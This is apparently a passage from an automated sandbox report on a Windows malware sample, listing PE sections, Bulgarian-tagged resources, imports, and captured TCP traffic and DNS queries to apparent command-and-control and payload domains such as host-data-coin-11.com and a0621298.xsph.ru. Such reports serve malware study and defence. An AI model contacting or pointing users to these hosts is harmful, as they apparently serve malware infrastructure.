.data	0x17000	0x281b8	0x22200	False	0.252797332875	data	2.7964138755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x40000	0xcd20	0xce00	False	0.660421723301	data	6.34041238895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x4c088	0x130	data	Bulgarian	Bulgaria
RT_ICON	0x40570	0xea8	data	Bulgarian	Bulgaria
RT_ICON	0x41418	0x8a8	data	Bulgarian	Bulgaria
RT_ICON	0x41cc0	0x6c8	data	Bulgarian	Bulgaria
RT_ICON	0x42388	0x568	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_ICON	0x428f0	0x25a8	data	Bulgarian	Bulgaria
RT_ICON	0x44e98	0x10a8	data	Bulgarian	Bulgaria
RT_ICON	0x45f40	0x988	data	Bulgarian	Bulgaria
RT_ICON	0x468c8	0x468	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_ICON	0x46da8	0xea8	data	Bulgarian	Bulgaria
RT_ICON	0x47c50	0x8a8	data	Bulgarian	Bulgaria
RT_ICON	0x484f8	0x25a8	dBase III DBT, version number 0, next free block index 40	Bulgarian	Bulgaria
RT_ICON	0x4aaa0	0x10a8	data	Bulgarian	Bulgaria
RT_ICON	0x4bb48	0x468	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_DIALOG	0x4c388	0x72	data	Bulgarian	Bulgaria
RT_STRING	0x4c400	0x452	data	Bulgarian	Bulgaria
RT_STRING	0x4c858	0x1ec	data	Bulgarian	Bulgaria
RT_STRING	0x4ca48	0x2d4	data	Bulgarian	Bulgaria
RT_ACCELERATOR	0x4c000	0x60	data	Bulgarian	Bulgaria
RT_ACCELERATOR	0x4c060	0x28	data	Bulgarian	Bulgaria
RT_GROUP_CURSOR	0x4c1b8	0x14	data	Bulgarian	Bulgaria
RT_GROUP_ICON	0x46d30	0x76	data	Bulgarian	Bulgaria
RT_GROUP_ICON	0x4bfb0	0x4c	data	Bulgarian	Bulgaria
RT_VERSION	0x4c1d0	0x1b8	COM executable for DOS	Bulgarian	Bulgaria

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasesLengthW, GetLocaleInfoA, SetComputerNameExA, VirtualQuery, GetDefaultCommConfigW, FindResourceExW, OpenJobObjectA, GetConsoleAliasA, InterlockedDecrement, CompareFileTime, GetProfileSectionA, GetConsoleAliasesA, GetConsoleTitleA, ReadConsoleW, SetFileTime, GlobalAlloc, Sleep, GetFileAttributesW, GetAtomNameW, SetConsoleTitleA, RaiseException, GetLastError, GetProcAddress, GetLongPathNameA, VirtualAlloc, PrepareTape, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

Version Infos

Description	Data
ProjectVersion	3.10.70.57
InternationalName	bomgvioci.iwa
Copyright	Copyrighz (C) 2021, fudkort
Translation	0x0129 0x0794

Possible Origin

Language of compilation system	Country where language is spoken	Map
Bulgarian	Bulgaria

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2022 20:50:14.905978918 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:14.962883949 CET	80	49715	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:14.963044882 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:14.963174105 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:14.963207006 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.072490931 CET	80	49715	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.072844982 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.074388027 CET	49715	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.130561113 CET	80	49715	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.413057089 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.468925953 CET	80	49716	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.469121933 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.469218969 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.469230890 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.530463934 CET	80	49716	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.584511995 CET	80	49716	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.584671974 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.584789038 CET	49716	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.640816927 CET	80	49716	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.916636944 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.971641064 CET	80	49717	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:15.971807957 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.972155094 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:15.972171068 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.033351898 CET	80	49717	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.340686083 CET	80	49717	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.340766907 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.341160059 CET	49717	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.388896942 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.396584034 CET	80	49717	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.444050074 CET	80	49718	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.444170952 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.444258928 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.444274902 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.501214981 CET	80	49718	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.556610107 CET	80	49718	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.556680918 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.556967020 CET	49718	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.618274927 CET	80	49718	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.888406992 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.945509911 CET	80	49720	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:16.945648909 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.945770979 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:16.945790052 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.001722097 CET	80	49720	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.335186005 CET	80	49720	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.336018085 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.336253881 CET	49720	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.371140003 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.393330097 CET	80	49720	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.433115005 CET	80	49721	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.433350086 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.433510065 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.433528900 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.489483118 CET	80	49721	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.536736965 CET	80	49721	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.538889885 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.539165974 CET	49721	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:17.570188046 CET	49722	80	192.168.2.5	185.186.142.166
Jan 13, 2022 20:50:17.594602108 CET	80	49721	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:17.626147032 CET	80	49722	185.186.142.166	192.168.2.5
Jan 13, 2022 20:50:18.139741898 CET	49722	80	192.168.2.5	185.186.142.166
Jan 13, 2022 20:50:18.195549011 CET	80	49722	185.186.142.166	192.168.2.5
Jan 13, 2022 20:50:18.702305079 CET	49722	80	192.168.2.5	185.186.142.166
Jan 13, 2022 20:50:18.758186102 CET	80	49722	185.186.142.166	192.168.2.5
Jan 13, 2022 20:50:18.791871071 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.847414970 CET	80	49723	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:18.847563028 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.847728968 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.847754955 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.903244972 CET	80	49723	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:18.954693079 CET	80	49723	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:18.954818010 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.955168009 CET	49723	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:18.989523888 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.015216112 CET	80	49723	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.045056105 CET	80	49724	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.045125961 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.045268059 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.045288086 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.100991011 CET	80	49724	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.158050060 CET	80	49724	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.158175945 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.158552885 CET	49724	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.189949036 CET	49725	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.213670015 CET	80	49724	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.246468067 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.246576071 CET	49725	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.246692896 CET	49725	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.337629080 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337666035 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337690115 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337714911 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337738991 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337762117 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.337784052 CET	49725	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.337820053 CET	49725	80	192.168.2.5	45.135.233.182
Jan 13, 2022 20:50:19.338047981 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.338077068 CET	80	49725	45.135.233.182	192.168.2.5
Jan 13, 2022 20:50:19.338099957 CET	80	49725	45.135.233.182	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2022 20:50:14.577049971 CET	192.168.2.5	8.8.8.8	0xfd21	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:15.097651005 CET	192.168.2.5	8.8.8.8	0x67b8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:15.604837894 CET	192.168.2.5	8.8.8.8	0x5b2a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:16.368606091 CET	192.168.2.5	8.8.8.8	0x2fbe	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:16.568407059 CET	192.168.2.5	8.8.8.8	0x425a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:17.347769976 CET	192.168.2.5	8.8.8.8	0x2663	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:18.771472931 CET	192.168.2.5	8.8.8.8	0x3e82	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:18.969288111 CET	192.168.2.5	8.8.8.8	0x6d91	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:19.171705961 CET	192.168.2.5	8.8.8.8	0x407c	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:21.509632111 CET	192.168.2.5	8.8.8.8	0x5049	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:21.724939108 CET	192.168.2.5	8.8.8.8	0x561d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:22.292650938 CET	192.168.2.5	8.8.8.8	0x87be	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:23.315615892 CET	192.168.2.5	8.8.8.8	0x60cc	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:23.627414942 CET	192.168.2.5	8.8.8.8	0x1fba	Standard query (0)	privacy-tools-for-you-780.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.195837021 CET	192.168.2.5	8.8.8.8	0xba95	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.386401892 CET	192.168.2.5	8.8.8.8	0x88f3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.631541967 CET	192.168.2.5	8.8.8.8	0x8aa	Standard query (0)	unicupload.top	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.707587957 CET	192.168.2.5	8.8.8.8	0xe57a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.926979065 CET	192.168.2.5	8.8.8.8	0x407f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.139836073 CET	192.168.2.5	8.8.8.8	0x2822	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.369760990 CET	192.168.2.5	8.8.8.8	0xd5c8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.567552090 CET	192.168.2.5	8.8.8.8	0xf69b	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.556504011 CET	192.168.2.5	8.8.8.8	0xdbc5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.757889986 CET	192.168.2.5	8.8.8.8	0x3417	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.960659981 CET	192.168.2.5	8.8.8.8	0xde5c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:32.173810959 CET	192.168.2.5	8.8.8.8	0xb0e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:34.603390932 CET	192.168.2.5	8.8.8.8	0x2046	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:34.810184956 CET	192.168.2.5	8.8.8.8	0x8348	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.096636057 CET	192.168.2.5	8.8.8.8	0xac98	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.335197926 CET	192.168.2.5	8.8.8.8	0xcf3	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.140340090 CET	192.168.2.5	8.8.8.8	0xd895	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.333856106 CET	192.168.2.5	8.8.8.8	0xcd87	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.548629045 CET	192.168.2.5	8.8.8.8	0x69e3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.076708078 CET	192.168.2.5	8.8.8.8	0x2d8f	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:56.620975971 CET	192.168.2.5	8.8.8.8	0x3455	Standard query (0)	patmushta.info	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.217998028 CET	192.168.2.5	8.8.8.8	0xb09d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.440074921 CET	192.168.2.5	8.8.8.8	0x552	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.692543030 CET	192.168.2.5	8.8.8.8	0xc02b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.898191929 CET	192.168.2.5	8.8.8.8	0x7c6e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:00.107970953 CET	192.168.2.5	8.8.8.8	0x89a6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:01.453991890 CET	192.168.2.5	8.8.8.8	0xf67f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:02.568372011 CET	192.168.2.5	8.8.8.8	0x1521	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.060121059 CET	192.168.2.5	8.8.8.8	0x419	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.279849052 CET	192.168.2.5	8.8.8.8	0xe98	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.501588106 CET	192.168.2.5	8.8.8.8	0xc12	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.713627100 CET	192.168.2.5	8.8.8.8	0xd038	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.943644047 CET	192.168.2.5	8.8.8.8	0x8f25	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:04.459856033 CET	192.168.2.5	8.8.8.8	0xace9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:04.658813953 CET	192.168.2.5	8.8.8.8	0x92b4	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.049961090 CET	192.168.2.5	8.8.8.8	0xed9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.255024910 CET	192.168.2.5	8.8.8.8	0x3059	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.499171019 CET	192.168.2.5	8.8.8.8	0x69ab	Standard query (0)	goo.su	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.517026901 CET	192.168.2.5	8.8.8.8	0xd592	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.716371059 CET	192.168.2.5	8.8.8.8	0x5e38	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.886979103 CET	192.168.2.5	8.8.8.8	0xcf9b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.179253101 CET	192.168.2.5	8.8.8.8	0xc75c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.409200907 CET	192.168.2.5	8.8.8.8	0xf592	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.605907917 CET	192.168.2.5	8.8.8.8	0xd851	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:13.098541021 CET	192.168.2.5	8.8.8.8	0x380a	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.349642992 CET	192.168.2.5	8.8.8.8	0x850e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.560170889 CET	192.168.2.5	8.8.8.8	0x82bc	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.806190968 CET	192.168.2.5	8.8.8.8	0x76d1	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:21.828104019 CET	192.168.2.5	8.8.8.8	0x97ec	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:22.121568918 CET	192.168.2.5	8.8.8.8	0x4f71	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:22.377249956 CET	192.168.2.5	8.8.8.8	0x21c0	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:23.009521008 CET	192.168.2.5	8.8.8.8	0x3bcd	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.063586950 CET	192.168.2.5	8.8.8.8	0x82c7	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.479244947 CET	192.168.2.5	8.8.8.8	0xf177	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.672830105 CET	192.168.2.5	8.8.8.8	0xa949	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.874068022 CET	192.168.2.5	8.8.8.8	0x5da8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.073750973 CET	192.168.2.5	8.8.8.8	0x5f8c	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.267398119 CET	192.168.2.5	8.8.8.8	0x72f6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.460829020 CET	192.168.2.5	8.8.8.8	0xad22	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.517657995 CET	192.168.2.5	8.8.8.8	0x59eb	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.664927006 CET	192.168.2.5	8.8.8.8	0x2c80	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.866749048 CET	192.168.2.5	8.8.8.8	0x3812	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.920264006 CET	192.168.2.5	8.8.8.8	0xf11	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:28.638899088 CET	192.168.2.5	8.8.8.8	0x23bb	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.410271883 CET	192.168.2.5	8.8.8.8	0xfb88	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.672091961 CET	192.168.2.5	8.8.8.8	0xdb83	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.923193932 CET	192.168.2.5	8.8.8.8	0xc153	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.026422977 CET	192.168.2.5	8.8.8.8	0x9964	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:33.084913015 CET	192.168.2.5	8.8.8.8	0xe25a	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:39.198669910 CET	192.168.2.5	8.8.8.8	0x60e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:39.451325893 CET	192.168.2.5	8.8.8.8	0xb836	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:39.708311081 CET	192.168.2.5	8.8.8.8	0xa8ef	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:43.278525114 CET	192.168.2.5	8.8.8.8	0x7de9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:43.868870974 CET	192.168.2.5	8.8.8.8	0xffbd	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:44.177290916 CET	192.168.2.5	8.8.8.8	0x5096	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:46.916022062 CET	192.168.2.5	8.8.8.8	0x9c6c	Standard query (0)	patmushta.info	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.415652037 CET	192.168.2.5	8.8.8.8	0xd24b	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2022 20:49:49.973989010 CET	8.8.8.8	192.168.2.5	0x753f	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2022 20:49:51.230057955 CET	8.8.8.8	192.168.2.5	0xc461	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2022 20:50:14.901438951 CET	8.8.8.8	192.168.2.5	0xfd21	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:15.412342072 CET	8.8.8.8	192.168.2.5	0x67b8	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:15.915755987 CET	8.8.8.8	192.168.2.5	0x5b2a	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:16.388226032 CET	8.8.8.8	192.168.2.5	0x2fbe	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:16.887778044 CET	8.8.8.8	192.168.2.5	0x425a	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:17.367253065 CET	8.8.8.8	192.168.2.5	0x2663	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:18.790960073 CET	8.8.8.8	192.168.2.5	0x3e82	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:18.988770008 CET	8.8.8.8	192.168.2.5	0x6d91	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:19.189316988 CET	8.8.8.8	192.168.2.5	0x407c	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
